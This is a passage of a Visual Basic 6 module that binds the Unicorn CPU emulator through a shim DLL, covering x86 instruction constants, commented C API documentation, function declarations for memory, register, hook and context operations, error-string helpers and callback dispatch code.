UC_X86_INS_VPUNPCKHBW = 1231 +' UC_X86_INS_VPUNPCKHDQ = 1232 +' UC_X86_INS_VPUNPCKHQDQ = 1233 +' UC_X86_INS_VPUNPCKHWD = 1234 +' UC_X86_INS_VPUNPCKLBW = 1235 +' UC_X86_INS_VPUNPCKLDQ = 1236 +' UC_X86_INS_VPUNPCKLQDQ = 1237 +' UC_X86_INS_VPUNPCKLWD = 1238 +' UC_X86_INS_VPXORD = 1239 +' UC_X86_INS_VPXORQ = 1240 +' UC_X86_INS_VPXOR = 1241 +' UC_X86_INS_VRCP14PD = 1242 +' UC_X86_INS_VRCP14PS = 1243 +' UC_X86_INS_VRCP14SD = 1244 +' UC_X86_INS_VRCP14SS = 1245 +' UC_X86_INS_VRCP28PD = 1246 +' UC_X86_INS_VRCP28PS = 1247 +' UC_X86_INS_VRCP28SD = 1248 +' UC_X86_INS_VRCP28SS = 1249 +' UC_X86_INS_VRCPPS = 1250 +' UC_X86_INS_VRCPSS = 1251 +' UC_X86_INS_VRNDSCALEPD = 1252 +' UC_X86_INS_VRNDSCALEPS = 1253 +' UC_X86_INS_VRNDSCALESD = 1254 +' UC_X86_INS_VRNDSCALESS = 1255 +' UC_X86_INS_VROUNDPD = 1256 +' UC_X86_INS_VROUNDPS = 1257 +' UC_X86_INS_VROUNDSD = 1258 +' UC_X86_INS_VROUNDSS = 1259 +' UC_X86_INS_VRSQRT14PD = 1260 +' UC_X86_INS_VRSQRT14PS = 1261 +' UC_X86_INS_VRSQRT14SD = 1262 +' UC_X86_INS_VRSQRT14SS = 1263 +' UC_X86_INS_VRSQRT28PD = 1264 +' UC_X86_INS_VRSQRT28PS = 1265 +' UC_X86_INS_VRSQRT28SD = 1266 +' UC_X86_INS_VRSQRT28SS = 1267 +' UC_X86_INS_VRSQRTPS = 1268 +' UC_X86_INS_VRSQRTSS = 1269 +' UC_X86_INS_VSCATTERDPD = 1270 +' UC_X86_INS_VSCATTERDPS = 1271 +' UC_X86_INS_VSCATTERPF0DPD = 1272 +' UC_X86_INS_VSCATTERPF0DPS = 1273 +' UC_X86_INS_VSCATTERPF0QPD = 1274 +' UC_X86_INS_VSCATTERPF0QPS = 1275 +' UC_X86_INS_VSCATTERPF1DPD = 1276 +' UC_X86_INS_VSCATTERPF1DPS = 1277 +' UC_X86_INS_VSCATTERPF1QPD = 1278 +' UC_X86_INS_VSCATTERPF1QPS = 1279 +' UC_X86_INS_VSCATTERQPD = 1280 +' UC_X86_INS_VSCATTERQPS = 1281 +' UC_X86_INS_VSHUFPD = 1282 +' UC_X86_INS_VSHUFPS = 1283 +' UC_X86_INS_VSQRTPD = 1284 +' UC_X86_INS_VSQRTPS = 1285 +' UC_X86_INS_VSQRTSD = 1286 +' UC_X86_INS_VSQRTSS = 1287 +' UC_X86_INS_VSTMXCSR = 1288 +' UC_X86_INS_VSUBPD = 1289 +' UC_X86_INS_VSUBPS = 1290 +' UC_X86_INS_VSUBSD = 1291 +' UC_X86_INS_VSUBSS = 1292 +' UC_X86_INS_VTESTPD = 1293 +' UC_X86_INS_VTESTPS = 1294 +' UC_X86_INS_VUNPCKHPD = 1295 +' UC_X86_INS_VUNPCKHPS = 1296 +' UC_X86_INS_VUNPCKLPD = 1297 +' UC_X86_INS_VUNPCKLPS = 1298 +' UC_X86_INS_VZEROALL = 1299 +' UC_X86_INS_VZEROUPPER = 1300 +' UC_X86_INS_WAIT = 1301 +' UC_X86_INS_WBINVD = 1302 +' UC_X86_INS_WRFSBASE = 1303 +' UC_X86_INS_WRGSBASE = 1304 +' UC_X86_INS_WRMSR = 1305 +' UC_X86_INS_XABORT = 1306 +' UC_X86_INS_XACQUIRE = 1307 +' UC_X86_INS_XBEGIN = 1308 +' UC_X86_INS_XCHG = 1309 +' UC_X86_INS_XCRYPTCBC = 1310 +' UC_X86_INS_XCRYPTCFB = 1311 +' UC_X86_INS_XCRYPTCTR = 1312 +' UC_X86_INS_XCRYPTECB = 1313 +' UC_X86_INS_XCRYPTOFB = 1314 +' UC_X86_INS_XEND = 1315 +' UC_X86_INS_XGETBV = 1316 +' UC_X86_INS_XLATB = 1317 +' UC_X86_INS_XRELEASE = 1318 +' UC_X86_INS_XRSTOR = 1319 +' UC_X86_INS_XRSTOR64 = 1320 +' UC_X86_INS_XRSTORS = 1321 +' UC_X86_INS_XRSTORS64 = 1322 +' UC_X86_INS_XSAVE = 1323 +' UC_X86_INS_XSAVE64 = 1324 +' UC_X86_INS_XSAVEC = 1325 +' UC_X86_INS_XSAVEC64 = 1326 +' UC_X86_INS_XSAVEOPT = 1327 +' UC_X86_INS_XSAVEOPT64 = 1328 +' UC_X86_INS_XSAVES = 1329 +' UC_X86_INS_XSAVES64 = 1330 +' UC_X86_INS_XSETBV = 1331 +' UC_X86_INS_XSHA1 = 1332 +' UC_X86_INS_XSHA256 = 1333 +' UC_X86_INS_XSTORE = 1334 +' UC_X86_INS_XTEST = 1335 +' UC_X86_INS_FDISI8087_NOP = 1336 +' UC_X86_INS_FENI8087_NOP = 1337 +' UC_X86_INS_ENDING = 1338 +'End Enum + +'-- [x86 specific] --------------- + +'// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +'// Borrow from SegmentCache in qemu/target-i386/cpu.h +'typedef struct uc_x86_mmr { +' uint16_t selector; /* not used by GDTR and IDTR */ +' uint64_t base; /* handle 32 or 64 bit CPUs */ +' uint32_t limit; +' uint32_t flags; /* not used by GDTR and IDTR */ +'} uc_x86_mmr; +' +'// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +'// @user_data: user data passed to tracing APIs. +'typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +'-------------------------------- + +'// Hook type for all events of unmapped memory access +'#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +'// Hook type for all events of illegal protected memory access +'#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +'// Hook type for all events of illegal read memory access +'#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +'// Hook type for all events of illegal write memory access +'#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +'// Hook type for all events of illegal fetch memory access +'#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +'// Hook type for all events of illegal memory access +'#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +'// Hook type for all events of valid memory access +'#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + + + +'/* +' Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +' +' @address: address where the code is being executed +' @size: size of machine instruction(s) being executed, or 0 when size is unknown +' @user_data: user data passed to tracing APIs. +'*/ +'typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +' public sub code_hook(byval uc as long , byval address as currency, byval size as long, byval user_data as long) +' +'/* +' Callback function for tracing interrupts (for uc_hook_intr()) +' +' @intno: interrupt number +' @user_data: user data passed to tracing APIs. +'*/ +'typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); +' +'/* +' Callback function for tracing IN instruction of X86 +' +' @port: port number +' @size: data size (1/2/4) to be read from this port +' @user_data: user data passed to tracing APIs. +'*/ +'typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); +' +'/* +' Callback function for OUT instruction of X86 +' +' @port: port number +' @size: data size (1/2/4) to be written to this port +' @value: data value to be written to this port +'*/ +'typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); +' +'/* +' Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) +' +' @type: this memory is being READ, or WRITE +' @address: address where the code is being executed +' @size: size of data being read or written +' @value: value of data being written to memory, or irrelevant if type = READ. +' @user_data: user data passed to tracing APIs +'*/ +'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, +' uint64_t address, int size, int64_t value, void *user_data); +' +'/* +' Callback function for handling invalid memory access events (UC_MEM_*_UNMAPPED and +' UC_MEM_*PROT events) +' +' @type: this memory is being READ, or WRITE +' @address: address where the code is being executed +' @size: size of data being read or written +' @value: value of data being written to memory, or irrelevant if type = READ. +' @user_data: user data passed to tracing APIs +' +' @return: return true to continue, or false to stop program (due to invalid memory). +'*/ +'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, +' uint64_t address, int size, int64_t value, void *user_data); + +'/* +' Memory region mapped by uc_mem_map() and uc_mem_map_ptr() +' Retrieve the list of memory regions with uc_mem_regions() +'*/ +'typedef struct uc_mem_region { +' uint64_t begin; // begin address of the region (inclusive) +' uint64_t end; // end address of the region (inclusive) +' uint32_t perms; // memory permissions of the region +'} uc_mem_region; +' +'// All type of queries for uc_query() API. +'typedef enum uc_query_type { +' // Dynamically query current hardware mode. +' UC_QUERY_MODE = 1, +' UC_QUERY_PAGE_SIZE, +'} uc_query_type; + + + +Public Declare Function ucs_dynload Lib "ucvbshim.dll" (ByVal path As String) As Long + + + +'/* +' Return combined API version & major and minor version numbers. +' +' @major: major number of API version +' @minor: minor number of API version +' +' @return hexical number as (major << 8 | minor), which encodes both +' major & minor versions. +' NOTE: This returned value can be compared with version number made +' with macro UC_MAKE_VERSION +' +' For example, second API version would return 1 in @major, and 1 in @minor +' The return value would be 0x0101 +' +' NOTE: if you only care about returned value, but not major and minor values, +' set both @major & @minor arguments to NULL. +'*/ +'UNICORN_EXPORT +'unsigned int uc_version(unsigned int *major, unsigned int *minor); +Public Declare Function ucs_version Lib "ucvbshim.dll" (ByRef major As Long, ByRef minor As Long) As Long + + +' +' +'/* +' Determine if the given architecture is supported by this library. +' +' @arch: architecture type (UC_ARCH_*) +' +' @return True if this library supports the given arch. +'*/ +'UNICORN_EXPORT +'bool uc_arch_supported(uc_arch arch); +Public Declare Function ucs_arch_supported Lib "ucvbshim.dll" (ByVal arch As uc_arch) As Long + + +'/* +' Create new instance of unicorn engine. +' +' @arch: architecture type (UC_ARCH_*) +' @mode: hardware mode. This is combined of UC_MODE_* +' @uc: pointer to uc_engine, which will be updated at return time +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); +Public Declare Function ucs_open Lib "ucvbshim.dll" (ByVal arch As uc_arch, ByVal mode As uc_mode, ByRef hEngine As Long) As uc_err + + +'/* +' Close UC instance: MUST do to release the handle when it is not used anymore. +' NOTE: this must be called only when there is no longer usage of Unicorn. +' The reason is the this API releases some cached memory, thus access to any +' Unicorn API after uc_close() might crash your application. +' After this, @uc is invalid, and nolonger usable. +' +' @uc: pointer to a handle returned by uc_open() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_close(uc_engine *uc); +Public Declare Function ucs_close Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + +' +'/* +' Query internal status of engine. +' +' @uc: handle returned by uc_open() +' @type: query type. See uc_query_type +' +' @result: save the internal status queried +' +' @return: error code of uc_err enum type (UC_ERR_*, see above) +'*/ +'// All type of queries for uc_query() API. +'typedef enum uc_query_type { +' // Dynamically query current hardware mode. +' UC_QUERY_MODE = 1, +' UC_QUERY_PAGE_SIZE, +'} uc_query_type; +'UNICORN_EXPORT +'uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + + + +'/* +' Report the last error number when some API function fail. +' Like glibc's errno, uc_errno might not retain its old value once accessed. +' +' @uc: handle returned by uc_open() +' +' @return: error code of uc_err enum type (UC_ERR_*, see above) +'*/ +'UNICORN_EXPORT +'uc_err uc_errno(uc_engine *uc); +Public Declare Function ucs_errno Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + + +' +'/* +' Return a string describing given error code. +' +' @code: error code (see UC_ERR_* above) +' +' @return: returns a pointer to a string that describes the error code +' passed in the argument @code +' */ +'UNICORN_EXPORT +'const char *uc_strerror(uc_err code); +Public Declare Function ucs_strerror Lib "ucvbshim.dll" (ByVal code As uc_err) As Long + + + +'/* +' Write to register. +' +' @uc: handle returned by uc_open() +' @regid: register ID that is to be modified. +' @value: pointer to the value that will set to register @regid +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); +Public Declare Function ucs_reg_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err + + +'/* +' Read register value. +' +' @uc: handle returned by uc_open() +' @regid: register ID that is to be retrieved. +' @value: pointer to a variable storing the register value. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_read(uc_engine *uc, int regid, void *value); +Public Declare Function ucs_reg_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err + + + +'/* +' Write multiple register values. +' +' @uc: handle returned by uc_open() +' @rges: array of register IDs to store +' @value: pointer to array of register values +' @count: length of both *regs and *vals +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); + + + +' +'/* +' Read multiple register values. +' +' @uc: handle returned by uc_open() +' @rges: array of register IDs to retrieve +' @value: pointer to array of values to hold registers +' @count: length of both *regs and *vals +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); + + + +'/* +' Write to a range of bytes in memory. +' +' @uc: handle returned by uc_open() +' @address: starting memory address of bytes to set. +' @bytes: pointer to a variable containing data to be written to memory. +' @size: size of memory to write to. +' +' NOTE: @bytes must be big enough to contain @size bytes. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); +Public Declare Function ucs_mem_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err + + + +'/* +' Read a range of bytes in memory. +' +' @uc: handle returned by uc_open() +' @address: starting memory address of bytes to get. +' @bytes: pointer to a variable containing data copied from memory. +' @size: size of memory to read. +' +' NOTE: @bytes must be big enough to contain @size bytes. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); +Public Declare Function ucs_mem_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err + + + + +'/* +' Emulate machine code in a specific duration of time. +' +' @uc: handle returned by uc_open() +' @begin: address where emulation starts +' @until: address where emulation stops (i.e when this address is hit) +' @timeout: duration to emulate the code (in microseconds). When this value is 0, +' we will emulate the code in infinite time, until the code is finished. +' @count: the number of instructions to be emulated. When this value is 0, +' we will emulate all the code available, until the code is finished. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); +Public Declare Function ucs_emu_start Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal startAt As Currency, ByVal endAt As Currency, ByVal timeout As Currency, ByVal count As Long) As uc_err + + +' +'/* +' Stop emulation (which was started by uc_emu_start() API. +' This is typically called from callback functions registered via tracing APIs. +' NOTE: for now, this will stop the execution only after the current block. +' +' @uc: handle returned by uc_open() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_emu_stop(uc_engine *uc); +Public Declare Function ucs_emu_stop Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + + + +'/* +' Register callback for a hook event. +' The callback will be run when the hook event is hit. +' +' @uc: handle returned by uc_open() +' @hh: hook handle returned from this registration. To be used in uc_hook_del() API +' @type: hook type +' @callback: callback to be run when instruction is hit +' @user_data: user-defined data. This will be passed to callback function in its +' last argument @user_data +' @begin: start address of the area where the callback is effect (inclusive) +' @end: end address of the area where the callback is effect (inclusive) +' NOTE 1: the callback is called only if related address is in range [@begin, @end] +' NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered +' @...: variable arguments (depending on @type) +' NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...) +' +'note vb6 does not support variable length arguments to api declares so UC_HOOK_INSN would require a seperate declare and stub +'also note that the callback is not used directly, it is proxied through a cdecl stub +'since the hook flags can be different combos, we pass in a catagory for simplicity in selecting which c callback to use..(bit sloppy but easy) +Public Declare Function ucs_hook_add Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef hHook As Long, ByVal hType As uc_hook_type, ByVal callback As Long, ByVal user_data As Long, ByVal beginAt As Currency, ByVal endAt As Currency, ByVal catagory As Long, Optional ByVal inst_id As Long = 0) As uc_err + + +'/* +' Unregister (remove) a hook callback. +' This API removes the hook callback registered by uc_hook_add(). +' NOTE: this should be called only when you no longer want to trace. +' After this, @hh is invalid, and nolonger usable. +' +' @uc: handle returned by uc_open() +' @hh: handle returned by uc_hook_add() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_hook_del(uc_engine *uc, uc_hook hh); +Public Declare Function ucs_hook_del Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal hHook As Long) As uc_err + + + +'/* +' Map memory in for emulation. +' This API adds a memory region that can be used by emulation. +' +' @uc: handle returned by uc_open() +' @address: starting address of the new memory region to be mapped in. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the new memory region to be mapped in. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: Permissions for the newly mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +Public Declare Function ucs_mem_map Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot) As uc_err + + + +'/* +' Map existing host memory in for emulation. +' This API adds a memory region that can be used by emulation. +' +' @uc: handle returned by uc_open() +' @address: starting address of the new memory region to be mapped in. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the new memory region to be mapped in. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: Permissions for the newly mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. +' @ptr: pointer to host memory backing the newly mapped memory. This host memory is +' expected to be an equal or larger size than provided, and be mapped with at +' least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); +Public Declare Function ucs_mem_map_ptr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perms As uc_prot, ByVal ptr As Long) As uc_err + + + +'/* +' Unmap a region of emulation memory. +' This API deletes a memory mapping from the emulation memory space. +' +' @uc: handle returned by uc_open() +' @address: starting address of the memory region to be unmapped. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the memory region to be modified. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); +Public Declare Function ucs_mem_unmap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long) As uc_err + + +'/* +' Set memory permissions for emulation memory. +' This API changes permissions on an existing memory region. +' +' @uc: handle returned by uc_open() +' @address: starting address of the memory region to be modified. +' This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. +' @size: size of the memory region to be modified. +' This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. +' @perms: New permissions for the mapped region. +' This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, +' or this will return with UC_ERR_ARG error. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +Public Declare Function ucs_mem_protect Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByVal size As Long, ByVal perm As uc_prot) As uc_err + + + +'/* +' Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() +' This API allocates memory for @regions, and user must free this memory later +' by free() to avoid leaking memory. +' NOTE: memory regions may be splitted by uc_mem_unmap() +' +' @uc: handle returned by uc_open() +' @regions: pointer to an array of uc_mem_region struct. This is allocated by +' Unicorn, and must be freed by user later +' @count: pointer to number of struct uc_mem_region contained in @regions +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); +'simplofied for vb use: uc_err __stdcall getMemMap(uc_engine *uc, _CollectionPtr *pColl){ + +'fills a collection with csv values of all memory regions.. +Public Declare Function get_memMap Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef col As Collection) As uc_err + + +'/* +' Allocate a region that can be used with uc_context_{save,restore} to perform +' quick save/rollback of the CPU context, which includes registers and some +' internal metadata. Contexts may not be shared across engine instances with +' differing arches or modes. +' +' @uc: handle returned by uc_open() +' @context: pointer to a uc_engine*. This will be updated with the pointer to +' the new context on successful return of this function. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_context_alloc(uc_engine *uc, uc_context **context); +Public Declare Function ucs_context_alloc Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef context As Long) As uc_err + + + +'/* +' Free the resource allocated by uc_context_alloc. +' +' @context: handle returned by uc_context_alloc() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_free(void* mem); +Public Declare Function ucs_free Lib "ucvbshim.dll" (ByVal mem As Long) As uc_err + + + +'/* +' Save a copy of the internal CPU context. +' This API should be used to efficiently make or update a saved copy of the +' internal CPU state. +' +' @uc: handle returned by uc_open() +' @context: handle returned by uc_context_alloc() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_context_save(uc_engine *uc, uc_context *context); +Public Declare Function ucs_context_save Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err + + + +'/* +' Restore the current CPU context from a saved copy. +' This API should be used to roll the CPU context back to a previous +' state saved by uc_context_save(). +' +' @uc: handle returned by uc_open() +' @buffer: handle returned by uc_context_alloc that has been used with uc_context_save +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_context_restore(uc_engine *uc, uc_context *context); +Public Declare Function ucs_context_restore Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal context As Long) As uc_err + + + +'uses libdasm to retrieve the 32bit disassembly at a specified va +'int __stdcall disasm_addr(uc_engine *uc, int va, char *str, int bufLen){ +Public Declare Function disasm_addr Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Long, ByVal buf As String, ByVal size As Long) As Long + + +'simplified access to map and write data to emu memory +'uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ +Public Declare Function mem_write_block Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef data As Byte, ByVal size As Long, ByVal perm As Long) As uc_err + +Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long +Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long + +'api version of the below.. +'Function err2str(e As uc_err) As String +' Dim lpStr As Long +' Dim length As Long +' Dim buf() As Byte +' +' lpStr = ucs_strerror(e) +' If lpStr = 0 Then Exit Function +' +' length = lstrlen(lpStr) +' If length = 0 Then Exit Function +' +' ReDim buf(1 To length) +' CopyMemory buf(1), ByVal lpStr, length +' +' err2str2 = StrConv(buf, vbUnicode, &H409) +' +'End Function + +Function err2str(e As uc_err) As String + + err2str = "Unknown error code: " & e + + If e = uc_err_ok Then err2str = "No error: everything was fine" + If e = UC_ERR_NOMEM Then err2str = "Out-Of-Memory error: uc_open(), uc_emulate()" + If e = UC_ERR_ARCH Then err2str = "Unsupported architecture: uc_open()" + If e = UC_ERR_HANDLE Then err2str = "Invalid handle" + If e = UC_ERR_MODE Then err2str = "Invalid/unsupported mode: uc_open()" + If e = UC_ERR_VERSION Then err2str = "Unsupported version (bindings)" + If e = UC_ERR_READ_UNMAPPED Then err2str = "Quit emulation due to READ on unmapped memory: uc_emu_start()" + If e = UC_ERR_WRITE_UNMAPPED Then err2str = "Quit emulation due to WRITE on unmapped memory: uc_emu_start()" + If e = UC_ERR_FETCH_UNMAPPED Then err2str = "Quit emulation due to FETCH on unmapped memory: uc_emu_start()" + If e = UC_ERR_HOOK Then err2str = "Invalid hook type: uc_hook_add()" + If e = UC_ERR_INSN_INVALID Then err2str = "Quit emulation due to invalid instruction: uc_emu_start()" + If e = UC_ERR_MAP Then err2str = "Invalid memory mapping: uc_mem_map()" + If e = UC_ERR_WRITE_PROT Then err2str = "Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start()" + If e = UC_ERR_READ_PROT Then err2str = "Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start()" + If e = UC_ERR_FETCH_PROT Then err2str = "Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start()" + If e = UC_ERR_ARG Then err2str = "Inavalid argument provided to uc_xxx function (See specific function API)" + If e = UC_ERR_READ_UNALIGNED Then err2str = "Unaligned read" + If e = UC_ERR_WRITE_UNALIGNED Then err2str = "Unaligned write" + If e = UC_ERR_FETCH_UNALIGNED Then err2str = "Unaligned fetch" + If e = UC_ERR_HOOK_EXIST Then err2str = "hook for this event already existed" + If e = UC_ERR_RESOURCE Then err2str = "Insufficient resource: uc_emu_start()" + If e = UC_ERR_EXCEPTION Then err2str = "Unhandled CPU exception" + +End Function + +Function memType2str(t As uc_mem_type) + + memType2str = "Unknown memType: " & t + + If t = UC_MEM_READ Then memType2str = "Memory is read from" + If t = uc_mem_write Then memType2str = "Memory is written to" + If t = UC_MEM_FETCH Then memType2str = "Memory is fetched" + If t = UC_MEM_READ_UNMAPPED Then memType2str = "Unmapped memory is read from" + If t = UC_MEM_WRITE_UNMAPPED Then memType2str = "Unmapped memory is written to" + If t = UC_MEM_FETCH_UNMAPPED Then memType2str = "Unmapped memory is fetched" + If t = UC_MEM_WRITE_PROT Then memType2str = "Write to write protected, but mapped, memory" + If t = UC_MEM_READ_PROT Then memType2str = "Read from read protected, but mapped, memory" + If t = UC_MEM_FETCH_PROT Then memType2str = "Fetch from non-executable, but mapped, memory" + If t = UC_MEM_READ_AFTER Then memType2str = "Memory is read from (successful access)" + +End Function + + + + + + + +'--------------------- [ callback support ] --------------------------------------------- + +'so the callbacks must live in a module (vb6 language limitation/safety feature) +'we use a simple lookup mechanism to support multiple instances + +Function findInstance(ptr As Long) As ucIntel32 + On Error Resume Next + Set findInstance = instances("objptr:" & ptr) +End Function + +'in case we want to keep userdata for something else..this is just as easy.. +Function findInstanceByUc(uc As Long) As ucIntel32 + Dim u As ucIntel32 + For Each u In instances + If u.uc = uc Then + Set findInstanceByUc = u + Exit Function + End If + Next +End Function + +'typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +Public Sub code_hook(ByVal uc As Long, ByVal address As Currency, ByVal size As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_code_hook address, size +End Sub + +Public Sub block_hook(ByVal uc As Long, ByVal address As 